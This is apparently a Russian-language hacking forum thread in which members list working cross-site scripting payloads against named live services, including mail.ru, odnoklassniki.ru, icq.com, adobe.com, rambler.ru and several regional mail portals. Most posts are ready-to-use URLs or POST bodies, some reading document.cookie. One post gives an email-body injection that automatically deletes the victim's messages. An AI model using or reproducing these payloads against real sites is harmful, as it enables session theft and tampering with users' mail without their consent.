Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Unix@, как эту XSS можно использовать на практике?
     
    1. mr.Penguin

      mr.Penguin Member

      Joined:
      8 Mar 2012
      Messages:
      40
      Likes Received:
      37
      Reputations:
      74
      @bigmir.net

      Тип уязвимости: Активная XSS
      Находится в сервисе "Дневники".

      Где найти?
      Мой дневник => Заметки => Добавить заметку​
      Уязвимое поле:
      Теги​
      Пример:
      <script>alert('xss')</script>​
       
      1. Unix@

        Unix@ New Member

        Joined:
        25 Sep 2011
        Messages:
        0
        Likes Received:
        3
        Reputations:
        6
        XSS на Mail.ru

        Работает только у авторизованных.

        Нажать кнопку Продолжить
         
        1. mr.Penguin

          mr.Penguin Member

          Joined:
          8 Mar 2012
          Messages:
          40
          Likes Received:
          37
          Reputations:
          74
          Code:
          http://vashdom.tut.by/search/?search=</title><script>alert('xss')</script>
           
          1. Unix@

            Unix@ New Member

            Joined:
            25 Sep 2011
            Messages:
            0
            Likes Received:
            3
            Reputations:
            6
            TUT.by

            Пассивка TUT.by
             
            1. dev1k

              dev1k Member

              Joined:
              25 Nov 2011
              Messages:
              0
              Likes Received:
              44
              Reputations:
              49
              icq.com

              validate.icq.com/icq/validate.html?uid=1&sid=23"><script>alert('XSS')</script>&lang=en


              adobe.com

              store1.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert('xss')>&code=adobe&cat=classification
               
              4 people like this.
              1. eclipse

                eclipse Member

                Joined:
                19 Dec 2010
                Messages:
                155
                Likes Received:
                74
                Reputations:
                85
                Пассивка на ачате))

                PR 5 | GI - 4 980 000 | CY 240 | 243 000 :D

                Античат конечно не почтовый сервис, но я думаю меня простят)))


                http://video.antichat.ru/video/Номер видео/

                Post запрос
                Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (ссылка )
                 
                #187 eclipse, 31 Mar 2012
                Last edited: 31 Mar 2012
                1 person likes this.
                1. M_script

                  M_script Members of Antichat

                  Joined:
                  4 Nov 2004
                  Messages:
                  2,581
                  Likes Received:
                  1,317
                  Reputations:
                  1,557
                  Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл ;)
                   
                  1. eclipse

                    eclipse Member

                    Joined:
                    19 Dec 2010
                    Messages:
                    155
                    Likes Received:
                    74
                    Reputations:
                    85

                    Действительно, херня какая-то :D ))))
                    Оказывается при выполнении функции отправки комментария и происходит инжект, в код который занимается собственно отправкой:
                    Code:
                    function ajaxComment(){  //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
                                  [COLOR=Red]  var author = document.getElementsByName('author')[1].value;
                                    var message = document.getElementsByName('comment')[0].value;[/COLOR]
                                    var csrf = document.getElementsByName('csrfmiddlewaretoken')[0].value;
                                    $.ajax({
                                            type: "POST",
                                            url: document.location.href,
                                            data: "csrfmiddlewaretoken="+csrf+"&author="+author+"&comment="+message,
                                            success: function() {
                                                    $('#comment').hide().append('<div class="comment-box"><div class="comment-top"><span class="comment-box-nick">'+author+'</span> написал</div><p>'+message+'</p></div>').show('slow');
                                                    }
                                            });
                            return false;
                                                                    
                    } 
                    И хотя данные после отправки на php чистятся, сама возможность инъекции присутствует, но ее нельзя удаленно эксплуатировать, потому что страница защищена опять такие тем самым токеном, если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос

                    А моя статья оказывается тут нифига не поможет, потому что она нужна когда есть удаленный xss и требуется csrf, а у нас нет удаленного xss ))
                     
                    #189 eclipse, 31 Mar 2012
                    Last edited: 31 Mar 2012
                    1. M_script

                      M_script Members of Antichat

                      Joined:
                      4 Nov 2004
                      Messages:
                      2,581
                      Likes Received:
                      1,317
                      Reputations:
                      1,557
                      Но человек должен вставить свой код и нажать кнопку отправки. Есть идеи насчет практической реализации атаки?

                      Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.
                       
                      #190 M_script, 31 Mar 2012
                      Last edited: 31 Mar 2012
                      1 person likes this.
                      1. eclipse

                        eclipse Member

                        Joined:
                        19 Dec 2010
                        Messages:
                        155
                        Likes Received:
                        74
                        Reputations:
                        85
                        Я тоже самое сказал)) Имелось ввиду что можно было бы кликабельную пассивку получить..

                        Насчет практики, нет, не юзабельно (удаленно)

                        Хотя, теоретически))

                        Можно:
                        1.отправить человека на свой php скрипт
                        2.скрипт выводит iframe с античатом
                        3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент
                        4.инжект выполнится))

                        Ну в общем это из раздела фантастики))))
                         
                        #191 eclipse, 31 Mar 2012
                        Last edited: 31 Mar 2012
                        1. M_script

                          M_script Members of Antichat

                          Joined:
                          4 Nov 2004
                          Messages:
                          2,581
                          Likes Received:
                          1,317
                          Reputations:
                          1,557
                          Не получится. http://ru.wikipedia.org/wiki/Правило_ограничения_домена
                           
                          1. Га-Ноцри

                            Га-Ноцри Elder - Старейшина

                            Joined:
                            16 Oct 2011
                            Messages:
                            329
                            Likes Received:
                            177
                            Reputations:
                            76
                            km.ru

                            После ошибки авторизации на главной странице, вы будете перенаправлены на http://n.mail.km.ru/extra/form. Не фильтруется поле "Пароль".

                            Post:
                            PHP:
                            user_login=support-mail&user_domain=freemail.ru&user_password=%22%3E%3Cscript%3Ealert%28%27Hello%2C+world%27%29%3B%3C%2Fscript%3E&op=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&form_build_id=form-a080de13ffb21494853525a2e1c6cf72&form_id=_imap_mail_extra_login_form
                            Утверждение верно для всех доменов, кроме km.ru (@freemail.ru, @bossmail.ru etc.)
                             
                            1 person likes this.
                            1. Unix@

                              Unix@ New Member

                              Joined:
                              25 Sep 2011
                              Messages:
                              0
                              Likes Received:
                              3
                              Reputations:
                              6
                              Активная xss в теле письма на 59.ru

                              Активная xss в теле письма на http://59.ru/
                              Почта
                              Xss код
                              HTML:
                              <img src=k onerror=alert('xss') >
                              Далее я сделал бонус,автоудаление письма

                              Код автоудаление письма

                              HTML:
                              <img src=k onerror=mod_mail_message_form_action('messages_delete'); >
                              Я бы этот код запихал в JS фаил и вызвал через xss.

                              Но есть но,нужно сделать очистку корзины,поэтому надо делать через Js фаил.

                              PS создайте тему с активными xss в теле письма пжл.
                               
                              1 person likes this.
                              1. Unix@

                                Unix@ New Member

                                Joined:
                                25 Sep 2011
                                Messages:
                                0
                                Likes Received:
                                3
                                Reputations:
                                6
                                Активная xss на foto.meta.ua

                                Активка тут http://foto.meta.ua/4552903.image

                                Уязвимый код тэги

                                " onmouseover='alert(document.cookie)'

                                Выполняется принаведении на тэги.
                                 
                                1. Марок

                                  Марок Banned

                                  Joined:
                                  22 Apr 2012
                                  Messages:
                                  28
                                  Likes Received:
                                  0
                                  Reputations:
                                  0
                                  job.gala.net


                                  http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email="><script>alert('xz che za')</script>
                                   
                                  1. Sleep

                                    Sleep Elder - Старейшина

                                    Joined:
                                    31 Oct 2007
                                    Messages:
                                    274
                                    Likes Received:
                                    65
                                    Reputations:
                                    4
                                    http://avia.rambler.ru/anytime?max_days=%3Cimg%20src=x:%20onerror=alert(document.cookie)%3E
                                    http://avia.rambler.ru/anytime?min_days=%3Cimg%20src=x:%20onerror=alert(document.cookie)%3E
                                     
                                    1 person likes this.
                                    1. _Spamer_

                                      _Spamer_ Elder - Старейшина

                                      Joined:
                                      3 Feb 2009
                                      Messages:
                                      83
                                      Likes Received:
                                      140
                                      Reputations:
                                      16
                                      Пассивная XSS odnoklassniki.ru
                                      https://cards2.odnoklassniki.ru/index.html?ServiceDescr=<b>XSS</b>
                                       
                                      3 people like this.
                                      1. _Spamer_

                                        _Spamer_ Elder - Старейшина

                                        Joined:
                                        3 Feb 2009
                                        Messages:
                                        83
                                        Likes Received:
                                        140
                                        Reputations:
                                        16
                                        Пассивная XSS odnoklassniki.ru
                                        http://api.odnoklassniki.ru/fb.do?method=users.getInfo&js_callback=<BODY ONLOAD=alert('XSS')>
                                         
                                        1 person likes this.
                                        1. WallHack

                                          WallHack Elder - Старейшина

                                          Joined:
                                          18 Jul 2013
                                          Messages:
                                          306
                                          Likes Received:
                                          138
                                          Reputations:
                                          33
                                          Пассивная XSS в mail.ru

                                          Пассивная XSS в mail.ru работает в опере

                                          Code:
                                          http://gameshop.mail.ru/order/?back=%22%3E%3Cscript%3Ealert%28%29%3C/script%3E
                                          //Может ещё выложу ;)